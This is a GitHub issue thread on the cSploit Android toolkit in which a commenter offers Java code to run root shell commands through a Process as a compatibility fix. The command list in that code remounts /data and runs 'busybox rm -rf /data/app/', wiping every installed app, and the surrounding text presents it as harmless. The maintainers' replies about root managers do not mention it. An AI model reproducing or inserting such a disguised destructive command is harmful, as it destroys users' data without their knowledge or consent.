search

cSploit / android

cSploit - The most complete and advanced IT security professional toolkit on Android.
http://www.csploit.org/
GNU General Public License v3.0
3.29k stars 1.1k forks source link

Fix | bash local code execution #768

Open cioccarellia opened 7 years ago

cioccarellia commented 7 years ago

Instead of using SuperSu library for executing scripts or commands, use a Process. LibSuperUser is very old and it is compatible only with super-su and super-su based root managers.

This execution method is compatible with all SU-managers and it also uses a small number of resources

final String[] ShellCode = {"cd /", "mount -o remount,rw /data", "busybox rm -rf /data/app/", "killall org.csploit.android"};
final Process rootfs = Runtime.getRuntime().exec("su"); //Declaring a root process
                    final DataOutputStream OS = new DataOutputStream(rootfs.getOutputStream());
try {
  for (String tmpCmd : ShellCode) // Each element into the array is executed on the roots Process
   {
      OS.writeBytes(tmpCmd + "\n");
   }
  OS.writeBytes("exit\n");
  OS.flush();
 } catch (IOException e) {
   Runtime.getRuntime().exit(1); // No root detected
 }

If you replace the old code-execution method with this, all users can use cSploit, also if they haven't SuperSu

IwraStudios commented 7 years ago

thanks @AndreaCioccarelli, i will look at it later

tux-mind commented 7 years ago

Hi @AndreaCioccarelli , glad to see you here :blush:

I remember that I already made that in 94e6bbbed7c2a89778863e43a09f3f97b385e05d , long long time ago.

AFAIK the Process strategy is the one already used in cSploit as stated here.

But please feel free to propose any improvement, we will be happy to review them :smiley:

cioccarellia commented 7 years ago

I have not understood a thing: Why kingroot binaries are incompatible with cSploit?

tux-mind commented 7 years ago

I'd successfully used cSploit with devices rooted with KingRoot ( Galaxy J3 ), AFAIK you need the companion app KingUser to manage super user permissions.

Do you have it on the device ? Did you checked it's settings for cSploit ?

In SuperSU there is a preference that prevent re-installed apps to gain root access, even if you granted it before. Moreover sometimes I had to delete the permissions settings for cSploit from SuperSU after re-installing ( e.g. re-deploying ) the apk.

Please give a try to those tricks with KingUser and let us known if the problem is solved :)

Kind regards :)